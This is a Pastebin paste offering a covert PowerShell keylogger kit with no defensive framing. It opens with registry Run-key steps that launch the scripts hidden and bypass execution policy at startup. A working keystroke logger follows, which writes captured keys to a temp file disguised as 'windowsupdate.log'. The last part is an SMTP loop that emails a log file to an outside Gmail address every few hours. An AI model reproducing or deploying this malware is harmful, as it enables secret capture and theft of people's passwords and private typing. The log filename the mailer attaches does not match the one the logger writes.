daily pastebin goal
2%
SHARE
TWEET

Untitled

a guest Mar 14th, 2019 199 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. regedit
  2. Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  3. create registry key (string)
  4. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -file C:\keylogger.ps1
  5. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -file C:\smtp.ps1
  6.  
  7. <#
  8. PowerShell keystroke logger by shima
  9. http://vacmf.org/2013/01/23/powershell-keylogger/
  10. #>
  11.  
  12. $shell =  New-Object -ComObject "Shell.Application"
  13. $shell.minimizeall()
  14.  
  15. function KeyLog {
  16.    
  17.     # MapVirtualKeyMapTypes
  18.     # <summary>
  19.     # uCode is a virtual-key code and is translated into a scan code.
  20.     # If it is a virtual-key code that does not distinguish between left- and
  21.     # right-hand keys, the left-hand scan code is returned.
  22.     # If there is no translation, the function returns 0.
  23.     # </summary>
  24.     $MAPVK_VK_TO_VSC = 0x00
  25.    
  26.     # <summary>
  27.     # uCode is a scan code and is translated into a virtual-key code that
  28.     # does not distinguish between left- and right-hand keys. If there is no
  29.     # translation, the function returns 0.
  30.     # </summary>
  31.     $MAPVK_VSC_TO_VK = 0x01
  32.    
  33.     # <summary>
  34.     # uCode is a virtual-key code and is translated into an unshifted
  35.     # character value in the low-order word of the return value. Dead keys (diacritics)
  36.     # are indicated by setting the top bit of the return value. If there is no
  37.     # translation, the function returns 0.
  38.     # </summary>
  39.     $MAPVK_VK_TO_CHAR = 0x02
  40.    
  41.     # <summary>
  42.     # Windows NT/2000/XP: uCode is a scan code and is translated into a
  43.     # virtual-key code that distinguishes between left- and right-hand keys. If
  44.     # there is no translation, the function returns 0.
  45.     # </summary>
  46.     $MAPVK_VSC_TO_VK_EX = 0x03
  47.    
  48.     # <summary>
  49.     # Not currently documented
  50.     # </summary>
  51.     $MAPVK_VK_TO_VSC_EX = 0x04
  52.    
  53.     $virtualkc_sig = @'
  54. [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
  55. public static extern short GetAsyncKeyState(int virtualKeyCode);
  56. '@
  57.  
  58.     $kbstate_sig = @'
  59. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  60. public static extern int GetKeyboardState(byte[] keystate);
  61. '@
  62.  
  63.     $mapchar_sig = @'
  64. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  65. public static extern int MapVirtualKey(uint uCode, int uMapType);
  66. '@
  67.  
  68.     $tounicode_sig = @'
  69. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  70. public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
  71. '@
  72.  
  73.     $getKeyState = Add-Type -MemberDefinition $virtualkc_sig -name "Win32GetState" -namespace Win32Functions -passThru
  74.     $getKBState = Add-Type -MemberDefinition $kbstate_sig -name "Win32MyGetKeyboardState" -namespace Win32Functions -passThru
  75.     $getKey = Add-Type -MemberDefinition $mapchar_sig -name "Win32MyMapVirtualKey" -namespace Win32Functions -passThru
  76.     $getUnicode = Add-Type -MemberDefinition $tounicode_sig -name "Win32MyToUnicode" -namespace Win32Functions -passThru
  77.  
  78.     while ($true) {
  79.         Start-Sleep -Milliseconds 40
  80.         $gotit = ""
  81.        
  82.         for ($char = 1; $char -le 254; $char++) {
  83.             $vkey = $char
  84.             $gotit = $getKeyState::GetAsyncKeyState($vkey)
  85.            
  86.             if ($gotit -eq -32767) {
  87.            
  88.                 $l_shift = $getKeyState::GetAsyncKeyState(160)
  89.                 $r_shift = $getKeyState::GetAsyncKeyState(161)
  90.                 $caps_lock = [console]::CapsLock
  91.                
  92.                 $scancode = $getKey::MapVirtualKey($vkey, $MAPVK_VSC_TO_VK_EX)
  93.                
  94.                 $kbstate = New-Object Byte[] 256
  95.                 $checkkbstate = $getKBState::GetKeyboardState($kbstate)
  96.                
  97.                 $mychar = New-Object -TypeName "System.Text.StringBuilder";
  98.                 $unicode_res = $getUnicode::ToUnicode($vkey, $scancode, $kbstate, $mychar, $mychar.Capacity, 0)
  99.                
  100.                 if ($unicode_res -gt 0) {
  101.                     $logfile = "$env:temp\windowsupdate.log"
  102.                     Out-File -FilePath $logfile -Encoding Unicode -Append -InputObject $mychar.ToString()
  103.                 }
  104.             }
  105.         }
  106.     }
  107. }
  108.  
  109. KeyLog
  110.  
  111.  
  112.  
  113.  
  114.  
  115. ##Developer : Suresh Kumar
  116.  
  117. ##Date   : 25 October 2018
  118.  
  119. ## Variables definition
  120.  
  121. while(1)
  122. {
  123.  
  124.     $EmailFromAddress = "send0@gmail.com"
  125.  
  126.     $EmailToAddress = "recieved@gmail.com"      ## The mail id to which we need to send file
  127.  
  128.     $Subject = "Log File"
  129.  
  130.     $Body = “Download File.”
  131.  
  132.     $attachment = "key.log"   ## File Location
  133.  
  134.     $smtpserver = "smtp.gmail.com"
  135.  
  136.  
  137.  
  138.     ##Mail configuration
  139.  
  140.  
  141.  
  142.     $message = new-object System.Net.Mail.MailMessage
  143.  
  144.     $message.From = $EmailFromAddress
  145.  
  146.     $message.To.Add($EmailToAddress)
  147.  
  148.     $message.IsBodyHtml = $True
  149.  
  150.     $message.Subject = $Subject
  151.  
  152.     $attach = new-object Net.Mail.Attachment($attachment)
  153.  
  154.     $message.Attachments.Add($attach)
  155.  
  156.     $message.body = $Body
  157.  
  158.     $smtp = new-object Net.Mail.SmtpClient($smtpserver,587)
  159.  
  160.     $smtp.EnableSsl = $True
  161.  
  162.     $smtp.Credentials = New-Object System.Net.NetworkCredential('email@gmail.com','password');
  163.  
  164.     $smtp.Send($message)
  165.  
  166.     start-sleep -seconds 26000
  167.  
  168. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top